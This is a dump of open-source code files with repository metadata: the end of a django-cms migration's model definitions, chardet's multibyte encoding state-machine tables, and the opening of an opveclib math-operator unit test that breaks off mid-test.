'draft': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'static_draft'", 'null': 'True', 'to': "orm['cms.Placeholder']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'public': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'static_public'", 'null': 'True', 'to': "orm['cms.Placeholder']"})
},
'cms.title': {
'Meta': {'unique_together': "(('language', 'page'),)", 'object_name': 'Title'},
'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'has_url_overwrite': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}),
'menu_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'max_length': '155', 'null': 'True', 'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'title_set'", 'to': "orm['cms.Page']"}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'publisher_is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'publisher_public': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'publisher_draft'", 'unique': 'True', 'null': 'True', 'to': "orm['cms.Title']"}),
'publisher_state': ('django.db.models.fields.SmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'redirect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'cms.usersettings': {
'Meta': {'object_name': 'UserSettings'},
'clipboard': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'djangocms_usersettings'", 'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['cms'] | bsd-3-clause |
albertliangcode/Pi_MonteCarloSim | venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/mbcssm.py | 1783 | 19590 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .constants import eStart, eError, eItsMe
# BIG5
BIG5_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
4,4,4,4,4,4,4,4, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
4,3,3,3,3,3,3,3, # a0 - a7
3,3,3,3,3,3,3,3, # a8 - af
3,3,3,3,3,3,3,3, # b0 - b7
3,3,3,3,3,3,3,3, # b8 - bf
3,3,3,3,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
BIG5_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,#08-0f
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart#10-17
)
Big5CharLenTable = (0, 1, 1, 2, 0)
Big5SMModel = {'classTable': BIG5_cls,
'classFactor': 5,
'stateTable': BIG5_st,
'charLenTable': Big5CharLenTable,
'name': 'Big5'}
# CP949
CP949_cls = (
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,0,0, # 00 - 0f
1,1,1,1,1,1,1,1, 1,1,1,0,1,1,1,1, # 10 - 1f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 20 - 2f
1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1, # 30 - 3f
1,4,4,4,4,4,4,4, 4,4,4,4,4,4,4,4, # 40 - 4f
4,4,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 50 - 5f
1,5,5,5,5,5,5,5, 5,5,5,5,5,5,5,5, # 60 - 6f
5,5,5,5,5,5,5,5, 5,5,5,1,1,1,1,1, # 70 - 7f
0,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 80 - 8f
6,6,6,6,6,6,6,6, 6,6,6,6,6,6,6,6, # 90 - 9f
6,7,7,7,7,7,7,7, 7,7,7,7,7,8,8,8, # a0 - af
7,7,7,7,7,7,7,7, 7,7,7,7,7,7,7,7, # b0 - bf
7,7,7,7,7,7,9,2, 2,3,2,2,2,2,2,2, # c0 - cf
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # d0 - df
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,2, # e0 - ef
2,2,2,2,2,2,2,2, 2,2,2,2,2,2,2,0, # f0 - ff
)
CP949_st = (
#cls= 0 1 2 3 4 5 6 7 8 9 # previous state =
eError,eStart, 3,eError,eStart,eStart, 4, 5,eError, 6, # eStart
eError,eError,eError,eError,eError,eError,eError,eError,eError,eError, # eError
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe, # eItsMe
eError,eError,eStart,eStart,eError,eError,eError,eStart,eStart,eStart, # 3
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 4
eError,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart,eStart, # 5
eError,eStart,eStart,eStart,eStart,eError,eError,eStart,eStart,eStart, # 6
)
CP949CharLenTable = (0, 1, 2, 0, 1, 1, 2, 2, 0, 2)
CP949SMModel = {'classTable': CP949_cls,
'classFactor': 10,
'stateTable': CP949_st,
'charLenTable': CP949CharLenTable,
'name': 'CP949'}
# EUC-JP
EUCJP_cls = (
4,4,4,4,4,4,4,4, # 00 - 07
4,4,4,4,4,4,5,5, # 08 - 0f
4,4,4,4,4,4,4,4, # 10 - 17
4,4,4,5,4,4,4,4, # 18 - 1f
4,4,4,4,4,4,4,4, # 20 - 27
4,4,4,4,4,4,4,4, # 28 - 2f
4,4,4,4,4,4,4,4, # 30 - 37
4,4,4,4,4,4,4,4, # 38 - 3f
4,4,4,4,4,4,4,4, # 40 - 47
4,4,4,4,4,4,4,4, # 48 - 4f
4,4,4,4,4,4,4,4, # 50 - 57
4,4,4,4,4,4,4,4, # 58 - 5f
4,4,4,4,4,4,4,4, # 60 - 67
4,4,4,4,4,4,4,4, # 68 - 6f
4,4,4,4,4,4,4,4, # 70 - 77
4,4,4,4,4,4,4,4, # 78 - 7f
5,5,5,5,5,5,5,5, # 80 - 87
5,5,5,5,5,5,1,3, # 88 - 8f
5,5,5,5,5,5,5,5, # 90 - 97
5,5,5,5,5,5,5,5, # 98 - 9f
5,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,0,5 # f8 - ff
)
EUCJP_st = (
3, 4, 3, 5,eStart,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eStart,eError,eStart,eError,eError,eError,#10-17
eError,eError,eStart,eError,eError,eError, 3,eError,#18-1f
3,eError,eError,eError,eStart,eStart,eStart,eStart#20-27
)
EUCJPCharLenTable = (2, 2, 2, 3, 1, 0)
EUCJPSMModel = {'classTable': EUCJP_cls,
'classFactor': 6,
'stateTable': EUCJP_st,
'charLenTable': EUCJPCharLenTable,
'name': 'EUC-JP'}
# EUC-KR
EUCKR_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,3,3,3, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,3,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,0 # f8 - ff
)
EUCKR_st = (
eError,eStart, 3,eError,eError,eError,eError,eError,#00-07
eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,eStart #08-0f
)
EUCKRCharLenTable = (0, 1, 2, 0)
EUCKRSMModel = {'classTable': EUCKR_cls,
'classFactor': 4,
'stateTable': EUCKR_st,
'charLenTable': EUCKRCharLenTable,
'name': 'EUC-KR'}
# EUC-TW
EUCTW_cls = (
2,2,2,2,2,2,2,2, # 00 - 07
2,2,2,2,2,2,0,0, # 08 - 0f
2,2,2,2,2,2,2,2, # 10 - 17
2,2,2,0,2,2,2,2, # 18 - 1f
2,2,2,2,2,2,2,2, # 20 - 27
2,2,2,2,2,2,2,2, # 28 - 2f
2,2,2,2,2,2,2,2, # 30 - 37
2,2,2,2,2,2,2,2, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,2, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,6,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,3,4,4,4,4,4,4, # a0 - a7
5,5,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,3,1,3,3,3,3, # c0 - c7
3,3,3,3,3,3,3,3, # c8 - cf
3,3,3,3,3,3,3,3, # d0 - d7
3,3,3,3,3,3,3,3, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,3,3,3, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,3,3,0 # f8 - ff
)
EUCTW_st = (
eError,eError,eStart, 3, 3, 3, 4,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17
eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f
5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27
eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3)
EUCTWSMModel = {'classTable': EUCTW_cls,
'classFactor': 7,
'stateTable': EUCTW_st,
'charLenTable': EUCTWCharLenTable,
'name': 'x-euc-tw'}
# GB2312
GB2312_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
3,3,3,3,3,3,3,3, # 30 - 37
3,3,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,4, # 78 - 7f
5,6,6,6,6,6,6,6, # 80 - 87
6,6,6,6,6,6,6,6, # 88 - 8f
6,6,6,6,6,6,6,6, # 90 - 97
6,6,6,6,6,6,6,6, # 98 - 9f
6,6,6,6,6,6,6,6, # a0 - a7
6,6,6,6,6,6,6,6, # a8 - af
6,6,6,6,6,6,6,6, # b0 - b7
6,6,6,6,6,6,6,6, # b8 - bf
6,6,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
6,6,6,6,6,6,6,6, # e0 - e7
6,6,6,6,6,6,6,6, # e8 - ef
6,6,6,6,6,6,6,6, # f0 - f7
6,6,6,6,6,6,6,0 # f8 - ff
)
GB2312_st = (
eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17
4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f
eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27
eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f
)
# To be accurate, the length of class 6 can be either 2 or 4.
# But it is not necessary to discriminate between the two since
# it is used for frequency analysis only, and we are validing
# each code range there as well. So it is safe to set it to be
# 2 here.
GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2)
GB2312SMModel = {'classTable': GB2312_cls,
'classFactor': 7,
'stateTable': GB2312_st,
'charLenTable': GB2312CharLenTable,
'name': 'GB2312'}
# Shift_JIS
SJIS_cls = (
1,1,1,1,1,1,1,1, # 00 - 07
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
2,2,2,2,2,2,2,2, # 40 - 47
2,2,2,2,2,2,2,2, # 48 - 4f
2,2,2,2,2,2,2,2, # 50 - 57
2,2,2,2,2,2,2,2, # 58 - 5f
2,2,2,2,2,2,2,2, # 60 - 67
2,2,2,2,2,2,2,2, # 68 - 6f
2,2,2,2,2,2,2,2, # 70 - 77
2,2,2,2,2,2,2,1, # 78 - 7f
3,3,3,3,3,2,2,3, # 80 - 87
3,3,3,3,3,3,3,3, # 88 - 8f
3,3,3,3,3,3,3,3, # 90 - 97
3,3,3,3,3,3,3,3, # 98 - 9f
#0xa0 is illegal in sjis encoding, but some pages does
#contain such byte. We need to be more error forgiven.
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
3,3,3,3,3,3,3,3, # e0 - e7
3,3,3,3,3,4,4,4, # e8 - ef
3,3,3,3,3,3,3,3, # f0 - f7
3,3,3,3,3,0,0,0) # f8 - ff
SJIS_st = (
eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17
)
SJISCharLenTable = (0, 1, 1, 2, 0, 0)
SJISSMModel = {'classTable': SJIS_cls,
'classFactor': 6,
'stateTable': SJIS_st,
'charLenTable': SJISCharLenTable,
'name': 'Shift_JIS'}
# UCS2-BE
UCS2BE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2BE_st = (
5, 7, 7,eError, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17
6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f
6, 6, 6, 6, 5, 7, 7,eError,#20-27
5, 8, 6, 6,eError, 6, 6, 6,#28-2f
6, 6, 6, 6,eError,eError,eStart,eStart #30-37
)
UCS2BECharLenTable = (2, 2, 2, 0, 2, 2)
UCS2BESMModel = {'classTable': UCS2BE_cls,
'classFactor': 6,
'stateTable': UCS2BE_st,
'charLenTable': UCS2BECharLenTable,
'name': 'UTF-16BE'}
# UCS2-LE
UCS2LE_cls = (
0,0,0,0,0,0,0,0, # 00 - 07
0,0,1,0,0,2,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,3,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,3,3,3,3,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
0,0,0,0,0,0,0,0, # 80 - 87
0,0,0,0,0,0,0,0, # 88 - 8f
0,0,0,0,0,0,0,0, # 90 - 97
0,0,0,0,0,0,0,0, # 98 - 9f
0,0,0,0,0,0,0,0, # a0 - a7
0,0,0,0,0,0,0,0, # a8 - af
0,0,0,0,0,0,0,0, # b0 - b7
0,0,0,0,0,0,0,0, # b8 - bf
0,0,0,0,0,0,0,0, # c0 - c7
0,0,0,0,0,0,0,0, # c8 - cf
0,0,0,0,0,0,0,0, # d0 - d7
0,0,0,0,0,0,0,0, # d8 - df
0,0,0,0,0,0,0,0, # e0 - e7
0,0,0,0,0,0,0,0, # e8 - ef
0,0,0,0,0,0,0,0, # f0 - f7
0,0,0,0,0,0,4,5 # f8 - ff
)
UCS2LE_st = (
6, 6, 7, 6, 4, 3,eError,eError,#00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f
eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17
5, 5, 5,eError, 5,eError, 6, 6,#18-1f
7, 6, 8, 8, 5, 5, 5,eError,#20-27
5, 5, 5,eError,eError,eError, 5, 5,#28-2f
5, 5, 5,eError, 5,eError,eStart,eStart #30-37
)
UCS2LECharLenTable = (2, 2, 2, 2, 2, 2)
UCS2LESMModel = {'classTable': UCS2LE_cls,
'classFactor': 6,
'stateTable': UCS2LE_st,
'charLenTable': UCS2LECharLenTable,
'name': 'UTF-16LE'}
# UTF-8
UTF8_cls = (
1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value
1,1,1,1,1,1,0,0, # 08 - 0f
1,1,1,1,1,1,1,1, # 10 - 17
1,1,1,0,1,1,1,1, # 18 - 1f
1,1,1,1,1,1,1,1, # 20 - 27
1,1,1,1,1,1,1,1, # 28 - 2f
1,1,1,1,1,1,1,1, # 30 - 37
1,1,1,1,1,1,1,1, # 38 - 3f
1,1,1,1,1,1,1,1, # 40 - 47
1,1,1,1,1,1,1,1, # 48 - 4f
1,1,1,1,1,1,1,1, # 50 - 57
1,1,1,1,1,1,1,1, # 58 - 5f
1,1,1,1,1,1,1,1, # 60 - 67
1,1,1,1,1,1,1,1, # 68 - 6f
1,1,1,1,1,1,1,1, # 70 - 77
1,1,1,1,1,1,1,1, # 78 - 7f
2,2,2,2,3,3,3,3, # 80 - 87
4,4,4,4,4,4,4,4, # 88 - 8f
4,4,4,4,4,4,4,4, # 90 - 97
4,4,4,4,4,4,4,4, # 98 - 9f
5,5,5,5,5,5,5,5, # a0 - a7
5,5,5,5,5,5,5,5, # a8 - af
5,5,5,5,5,5,5,5, # b0 - b7
5,5,5,5,5,5,5,5, # b8 - bf
0,0,6,6,6,6,6,6, # c0 - c7
6,6,6,6,6,6,6,6, # c8 - cf
6,6,6,6,6,6,6,6, # d0 - d7
6,6,6,6,6,6,6,6, # d8 - df
7,8,8,8,8,8,8,8, # e0 - e7
8,8,8,8,8,9,8,8, # e8 - ef
10,11,11,11,11,11,11,11, # f0 - f7
12,13,13,13,14,15,0,0 # f8 - ff
)
UTF8_st = (
eError,eStart,eError,eError,eError,eError, 12, 10,#00-07
9, 11, 8, 7, 6, 5, 4, 3,#08-0f
eError,eError,eError,eError,eError,eError,eError,eError,#10-17
eError,eError,eError,eError,eError,eError,eError,eError,#18-1f
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f
eError,eError, 5, 5, 5, 5,eError,eError,#30-37
eError,eError,eError,eError,eError,eError,eError,eError,#38-3f
eError,eError,eError, 5, 5, 5,eError,eError,#40-47
eError,eError,eError,eError,eError,eError,eError,eError,#48-4f
eError,eError, 7, 7, 7, 7,eError,eError,#50-57
eError,eError,eError,eError,eError,eError,eError,eError,#58-5f
eError,eError,eError,eError, 7, 7,eError,eError,#60-67
eError,eError,eError,eError,eError,eError,eError,eError,#68-6f
eError,eError, 9, 9, 9, 9,eError,eError,#70-77
eError,eError,eError,eError,eError,eError,eError,eError,#78-7f
eError,eError,eError,eError,eError, 9,eError,eError,#80-87
eError,eError,eError,eError,eError,eError,eError,eError,#88-8f
eError,eError, 12, 12, 12, 12,eError,eError,#90-97
eError,eError,eError,eError,eError,eError,eError,eError,#98-9f
eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7
eError,eError,eError,eError,eError,eError,eError,eError,#a8-af
eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7
eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf
eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7
eError,eError,eError,eError,eError,eError,eError,eError #c8-cf
)
UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6)
UTF8SMModel = {'classTable': UTF8_cls,
'classFactor': 16,
'stateTable': UTF8_st,
'charLenTable': UTF8CharLenTable,
'name': 'UTF-8'}
| mit |
opveclib/opveclib | opveclib/stdops/test_math.py | 2 | 14420 | # Copyright 2016 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
import unittest
import numpy as np
import tensorflow as tf
from ..operator import operator, evaluate, as_tensorflow
from ..expression import position_in, output_like
from ..local import clear_op_cache
from .math import add, sub, mul, div, neg, tanh, sin, cos, tan, sigmoid, split, concat
class TestMath(unittest.TestCase):
clear_op_cache()
def test_binary_infix(self):
"""
Make sure all binary infix operators yield the same result as numpy
"""
@operator()
def no_op(x):
out = output_like(x)
pos = position_in(x.shape)
out[pos] = x[pos]
return out
def test_infix(lhs, rhs):
ovl0 = no_op(lhs)
def test_np(fcn):
ovl_l = fcn(ovl0, rhs)
ovl_r = fcn(rhs, ovl0)
ovl_l, ovl_r = evaluate([ovl_l, ovl_r])
np_l = fcn(lhs, rhs)
np_r = fcn(rhs, lhs)
assert np.all(np.equal(ovl_l, np_l))
assert np.all(np.equal(ovl_r, np_r))
test_np(lambda x, y: x + y)
test_np(lambda x, y: x - y)
test_np(lambda x, y: x * y)
test_np(lambda x, y: x / y)
test_np(lambda x, y: x == y)
test_np(lambda x, y: x != y)
test_np(lambda x, y: x < y)
test_np(lambda x, y: x <= y)
test_np(lambda x, y: x > y)
test_np(lambda x, y: x >= y)
# OVL uses c-style fmod, not python style mod, so use numpy fmod function for test
# see : http://docs.scipy.org/doc/numpy/reference/generated/numpy.fmod.html
ovl_left, ovl_right = evaluate([ovl0 % rhs, rhs % ovl0])
np_left = np.fmod(lhs, rhs)
np_right = np.fmod(rhs, lhs)
assert np.all(np.equal(ovl_left, np_left))
assert np.all(np.equal(ovl_right, np_right))
ovl_neg = evaluate([-ovl0])
